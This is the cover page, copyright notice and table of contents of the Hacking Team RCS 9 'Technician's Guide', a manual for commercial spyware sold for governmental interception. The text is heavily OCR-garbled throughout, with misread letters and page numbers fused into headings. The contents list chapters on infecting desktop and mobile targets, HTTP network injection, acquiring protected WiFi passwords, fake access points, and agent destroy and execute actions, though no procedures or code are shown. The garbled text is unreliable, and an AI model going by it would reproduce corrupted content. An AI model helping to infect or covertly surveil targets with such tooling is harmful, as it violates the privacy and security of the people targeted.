Hacking Team RCS 9 Technician’s Guide

]Haci<ngTeam[ RCS 9 The hacking suite for governmental interception Technician's Guide If] 55?h X: it: Technician's Guide -uer.1.5 $2131.23 HT

Information ownership COPYRIGHT 2013, HT S.r.l. All rights reseryed in all countries. No part of this manual can be translated into other languages andfor adapted andf'or reproduced in other formats andf'or mechanically, electronically processed or photocopied, recorded or otherwise without prior written authorization from HackingTeam. All corporations and product names may be legal or registered trademarks, property of their respective owners. Specifically Internet Explorer? is a Microsoft Corporation registered trademark. Albeit text and images being selected with the utmost care, HackingTeam reseryes the right to change andf'or update the information hereto to correct typos andfor errors without any prior notice or additional liability. Any reference to nam es, data and addresses of companies not in the HackingTeam is purely coincidental and, unless otherwise indicated, included as examples to better clarify product use. NOTE: requests for additional copies of this manual or product technical information should be addressed to: HT S.r.l. yia della Moscoya, 13 20121 Milano (MI) Italy Tel.: 39 02 29 060 603 Fax: 39 02 63 118 946 e-mail: info@hackingteam.com

Contents Glossary . . xiv Guideintroduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 1 New guide features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 2 Supplied documentation 3 Printconcepts for notes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 4 Printconcepts for format . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 4 Product and guide addressees Software author identification data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 6 RC5 {Remote Control SystemDifferences between PCS 80 and PCS 7".6 versions 8 Glossarv . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 8 Infection vector glossarv for desktop . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 8 Infection vector glossarv for mobile .. 8 RC5 Console for the Technician . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .10 Starting the PCS Console . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..11 What the login page looks like ..11 Open RCS Console . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .11 Homepage description . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .12 Introduction _.12 What it looks like . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .12 Wizards in the homepage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 13 Introduction _.13 What it looks like . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .13 Investigation Wizard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 14 Shared interface elements and actions ..14 What the RCS Console looks like . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14 Actions alwavs available on the interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .16 Change interface language or password -18 Converting the RCS Console date?time to the actual time zone . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Table actions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Technician procedures .. 18 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .18 Procedures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 18 Injection on HTTP connections ._18 Infecting a com puter not connected to Internet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .19 Infecting a computer connected to Internet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .19 Keeping agent software updated .20 Operation and target . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..21 ver.1.S RC8 2CI13EI - peg. I

What you should know about operations .22 What is an operation .22 What you should know about targets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 22 What is a target .22 Operation management .22 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .22 What the function looks like .22 To learn more ..23 Viewing operation targets .24 Operation data .24 Operation page ..24 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .24 What the function looks like .24 To learn more ..25 Creating a factory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .26 Operation page data .26 Targets .. 2? Target page . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .28 Purpose .28 What the function looks like .28 To learn more . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..30 Creating a factory .30 Closing a factory or agent .. 3O Deleting a factory or agent . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..31 Importing target eyidence ..31 Target page data ..31 Icon yiew . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..31 Table yiew .32 What you should know about factories and agents -.33 Infection methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .33 Infection strategy components ..33 Factories .-33 How to create factories ..34 Installation yectors .. 34 Agents -.34 Data acquisition modules ..34 Compiling a factory ..35 Purpose -.35 Next steps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .35 What the function looks like ..35 yer.1.5 5EP-2CI13 RC5 C?i 201342] HT5.r.l. -pag. II

To learn more .36 Creating an agent -36 Creating an agent to be tested in demo mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Agents .33 What you should knovv about agents .39 Agent installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .39 Evidence acquisition for installation environment analvsis .39 Installation environment analvsis -39 Updating the scout agent .39 Agent .40 Offline and online agents -40 Temporarilvr disabling an agent . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .40 Agent testing .40 Agentconfiguration -41 Agent page . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .41 Purpose .41 What the function looks like .41 To learn more . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .43 Agent configuration log data .43 Agent event log data .44 Agent log data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44 Command page .44 Purpose -44 What the function looks like . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .44 To learn more .46 Transferring files toffrom a target -46 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .46 What the function looks like .46 To learn more .46 Factory and agent: basic configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .49 What you should knovv about basic configuration ..50 Basic configuration .-50 Exporting and importing configuration settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..50 Saving the configuration settings as a template ..50 Basic factorv or agent configuration .-50 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 50 Next steps .. 51 What the function looks like ..51 To learn more . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..52 Setting a factorv or agent configuration .. 53 Technician'stiiuicle ver.1.5 9E P-2013 REE. E- 201393 -pag. ill

Basic configuration data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .53 Factors; and agent: advanced con?guration .. 55 What vou should know about advanced configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .56 Advanced configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .56 Advanced configuration components -56 Reading sequences . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 5? Actions -58 Relations between actions and modules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 58 Relations between actions and events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .58 Modules ..59 Exporting and importing configuration settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..59 Saving the configuration settings as a template . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..59 Advanced factorv or agent configuration -59 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..59 Next steps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 60 What the function looks like ..E-O To learn more . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 62 Creating a simple activation sequence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 62 Creating a complex activation sequence .-62 Global agent data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 63 The Network Injector . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..55 What vou should know about Network Injector and its rules ..66 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..66 Network Injector tvpes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 66 Tvpes of resources that can be infected .-66 How to create a rule . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..66 Automatic or manual identification rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..66 What happens when a rule is ena bledfdisa bled Starting the infection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 6? Managing the Network Injector . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Purpose What vou can What the function looks like . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . To learn more ..E-9 Adding a new injection ruIe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 69 Send the rules to Network Injector . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 69 Injection rule data JO Checking Network Injector status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .74 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ver.1.5 SE 201393 -peg. iv

Identifying when Network Injector What you should know about Appliance Control Center .75 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..75 with RC5 seryer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 75 Injection interface IP address -75 Appliance Control Center . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..76 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 76 What you can do -.76 Password request . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..76 What the function looks like . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..76 To learn more ..77 Enabling with RC5 seryer to receiye new rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 77 Infecting targets using automatic identification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..78 Viewing infection details .79 Appliance Control Center data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 79 Network Injector data tab . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 79 What you should know about Tactical Control Center .. 80 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..80 Tactical Control Center operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..80 with RC5 seryer .. 81 Updating infection ruIes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..81 Using networkinterfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 81 Infection yia automatic identification .-81 Infection yia manual identification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 82 Enable with RC5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Protected WiFi network password acquisition -.83 Infection yia automatic identification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..83 Forcing unknown deyice authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..83 Infection yia manual identification ..83 Setting filters on tapped traffic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..83 Filter with regular expression . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..84 BPF {Berkeley Packet Filter} network filter ..84 Identifying a target by analyzing the chronology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..84 Emulating an Access Point known by the target . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..84 Tactical Control Center -.84 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..84 What you can ..85 Password request -.85 What the function looks like . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..85 To learn more . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 86 yer.1.5 5EP-2CI13 RCS 9 261383 HT5.r.l. - pag.

Enabling with RC5 server to receive new rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 86 Running a network test Acquiring a protected WiFi network password . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..88 Infecting targets using automatic identification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..89 Forcing unknown device authentication -.91 Infecting targets using manual identification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 91 Setting filters on tapped traffic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..92 Identifv the target by analvzing web chronologv -.93 Cleaning erroneouslvinfected devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 9A Emulating an Access Point known lav the target . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..94 Turn off Tactical Network Injector .-95 viewing infection details . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..95 Tactical Control Center data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..96 Network Injector data tab -.96 Found device data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 96 Wireless Intruder data tab . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Fake Access Point data tab System monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 99 5vstem monitoring {Monitor100 Purpose ..100 What the function looks like . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 100 To learn more . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..101 5vstem monitoring data {Monitor} -.101 5vstem component monitoring data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..101 License monitoring data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..102 Appendix: actions -.104 List of sub?actions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..105 Sub?action data description . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..105 Sub?action tvpe description .- 105 Destrov action . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 105 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..105 Operating svste ms .- 105 Para meters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 106 Execute action . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..106 Purpose ..106 Reference to the agent's folder . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..106 Operating svste ..106 5ignificant data Log action . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Teclmician'stiiuicle ver.1.5 5E P-2013 RC5 9 201363 -pag. vi

Operating systems .102 Parameters SMS action . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Purpose ..102 Operating systems Para meters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .108 action .108 Purpose __108 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .108 Desktop settings .109 Mobile settings -. 109 Uni nstall action . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . __110 Purpose __110 Operating systems __110 Parameters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..110 Appendix: events ..111 Eyent list -. 112 Eyent data description . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 112 Eyent type description ..112 4C eyent __113 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . __113 Operating systems .. 113 Parameters .- 113 Battery eyent . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .113 Purpose __113 Operating systems __113 Parameters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..113 Call eyent ..114 Purpose __114 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..114 Parameters ..114 Connection eyent __114 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . __114 Operating systems .. 114 Mobile settings __114 Desktop settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 115 Idle eyent .. 115 Purpose __115 Operating systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. 115 Parameters ..115 Teclmician'stiuide yer.1.5 RC5 f?i 201343 HT5.r.l. - pag.

